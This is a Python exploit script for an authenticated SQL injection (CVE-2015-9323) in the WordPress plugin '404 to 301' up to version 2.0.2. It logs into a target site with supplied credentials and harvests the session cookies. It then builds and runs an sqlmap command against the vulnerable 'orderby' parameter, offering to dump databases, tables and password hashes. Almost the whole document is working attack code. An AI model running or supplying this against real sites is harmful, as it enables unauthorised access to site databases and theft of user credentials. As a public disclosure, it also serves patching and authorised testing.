# Exploit Title: Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated) # Date 30.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/ # Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip # Version: <= 2.0.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2015-9323 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md ''' Description: The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection. ''' banner = ''' .o88b. db db d88888b .d888b. .d88b. db ooooo .d888b. d8888b. .d888b. d8888b. d8P Y8 88 88 88' VP `8D .8P 88. o88 8P~~~~ 88' `8D VP `8D VP `8D VP `8D 8P Y8 8P 88ooooo odD' 88 d'88 88 dP `V8o88' oooY' odD' oooY' 8b `8b d8' 88~~~~~ C8888D .88' 88 d' 88 88 V8888b. C8888D d8' ~~~b. .88' ~~~b. Y8b d8 `8bd8' 88. j88. `88 d8' 88 `8D d8' db 8D j88. db 8D `Y88P' YP Y88888P 888888D `Y88P' VP 88oobY' d8' Y8888P' 888888D Y8888P' [+] 404 to 301 - SQL-Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import os import requests from datetime import datetime import json # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap print ('[+] Payload for sqlmap exploitation:') cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"' exploit_risk = ' --level 2 --risk 2' exploit_cookie = r' --cookie="' + cookie + r'" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0' os.system(exploit_code) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))